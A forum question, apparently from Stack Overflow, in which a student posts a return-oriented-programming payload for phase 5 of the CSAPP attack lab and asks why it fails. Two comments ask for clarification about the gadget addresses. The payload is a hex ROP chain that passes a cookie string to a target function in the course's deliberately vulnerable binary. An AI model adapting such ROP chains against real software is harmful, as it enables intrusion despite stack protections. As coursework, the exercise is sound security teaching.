# CSAPP 3e Attack lab phase 5

Tags: assembly, x86-64, reverse-engineering, buffer-overflow, exploit

This is the phase 5 of attack lab. Due to address randomization and non-executable stack, we are supposed to use Return Oriented Programming (ROP) to pass the string pointer of a given cookie value as argument to a function called touch3. I cannot describe the question better since that's all I can understand so far, the full instruction is on this PDF page 10: 
[Attack Lab](http://csapp.cs.cmu.edu/3e/attacklab.pdf)!

This is my answer, but I am not sure what's wrong with it as it does not work.
[here is my objdump](https://justpaste.it/529fw)!

```
00 00 00 00 00 00 00 00 /* buffer */
00 00 00 00 00 00 00 00 /* buffer */
00 00 00 00 00 00 00 00 /* buffer */
D6 1a 40 00 00 00 00 00 /* mov %rsp,%rax == 48 89 e0 */
2D 1a 40 00 00 00 00 00 /* mov %rax,%rdi == 48 89 c7 */
3D 1a 40 00 00 00 00 00 /* pop rax       == 58    */
48 00 00 00 00 00 00 00 /* offset */
e4 1a 40 00 00 00 00 00 /* mov %eax,%edx == 89 c2 */
0B 1a 40 00 00 00 00 00 /* mov %edx,%ecx == 89 d1 */
FE 1a 40 00 00 00 00 00 /* mov %ecx,%esi == 89 ce */
5a 1a 40 00 00 00 00 00 /* lea add_xy */
2D 1a 40 00 00 00 00 00 /* mov %rax,%rdi == 48 89 c7  */
80 19 40 00 00 00 00 00 /* touch 3 address */
34 32 33 32 32 33 37 33 /* cookie as string */
```

One of the issues I encountered is that based on Encodings of movq instructions of certain register, I found more than one function on code farm and I was confused which one was the one.

is my logic correct? is there any mistake? why isn't it working?

thank you

Comment: `mov %rsp,%rax == 48 89 e0` looks like the correct encoding, but I don't see how it has any relevance to the `D6 1a 40 00 ...` line you put it next to as a comment.  That doesn't look like objdump output, and if that's your exploit payload then your question seems to have left out any details on the exploit or code at any target addresses you could return to.  (Thus it's not a [mcve], and/or it's too broad / unclear what you're asking.  SO questions *must* be self-contained.  Linking off-site for full details is fine, but there must be sufficient details without that.)

Comment: @PeterCordes I am sorry, I am myself limited on how this works, I am trying to figure it out. why do you think the address D6 1a 40 00  is wrong, can you please explain a little bit in depth

Comment: That's an address?  Nothing in your question said it was an address.  I thought it was supposed to be machine code, because the text introducing it said it was your `objdump`.  I wondered if maybe it was supposed to be an address, but you didn't show anything we could check your solution against if that was true.  `0x401aD6` is a plausible code address inside a position-dependent Linux executable, though.